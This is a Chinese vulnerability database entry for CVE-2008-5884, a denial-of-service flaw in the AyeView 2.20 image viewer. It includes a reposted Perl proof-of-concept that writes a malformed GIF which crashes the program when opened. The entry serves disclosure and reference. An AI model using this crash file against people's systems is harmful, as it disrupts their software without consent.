Zkesoft AyeView 图像处理拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1116335 漏洞类型
发布时间 2008-10-04 更新时间 2009-01-29
CVE编号 CVE-2008-5884 CNNVD-ID CNNVD-200901-104
漏洞平台 Windows CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/6668
https://cxsecurity.com/issue/WLB-2009010154
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200901-104
|漏洞详情
AyeView是图像处理工具软件,支持查看和格式转换。AyeView2.20版本允许用户协助式攻击者借助一个带有畸形页眉的GIF文件,引起拒绝服务攻击(应用程序崩溃)。
|漏洞EXP
Name      : AyeView v2.20 (malformed gif image) DoS Exploit
Credit    : suN8Hclf (DaRk-CodeRs Group), crimson.loyd@gmail.com
Download: : http://www.ayeview.com/downloads.htm
Greetz    : Luigi Auriemma, 0in, cOndemned, e.wiZz!, Gynvael Coldwind, 
            Katharsis, all from #dark-coders and others;]

PoC:



#!/usr/local/bin/perl   
# Open file (File->Open) or simply click on the image miniature
# AyeView freezes and after few seconds crashes...
# Tested on Windows XP SP2 & Windows 2000 SP4

my $code="\x47\x49\x46\x38\x39\x61\xff\xff\xff\xff\x0e".
         "\x00\x00\x2c\x00\x00\x00\x00\xff\xff\xff\xff\x00";
my $file="open_me.gif";

open(my $FILE, ">>$file") or die "[!]Cannot open file";
print $FILE $code;
close($FILE);
print "$file has been generated\n"
print "Credit: suN8Hclf, www.dark-coders.pl"

# milw0rm.com [2008-10-04]
|参考资料

来源:XF
名称:ayeview-gif-dos(45678)
链接:http://xforce.iss.net/xforce/xfdb/45678
来源:BID
名称:31572
链接:http://www.securityfocus.com/bid/31572
来源:BUGTRAQ
名称:20081004AyeViewv2.20(malformedgifimage)DoSExploit
链接:http://www.securityfocus.com/archive/1/archive/1/497045/100/0/threaded
来源:MILW0RM
名称:6668
链接:http://www.milw0rm.com/exploits/6668
来源:SREASON
名称:4900
链接:http://securityreason.com/securityalert/4900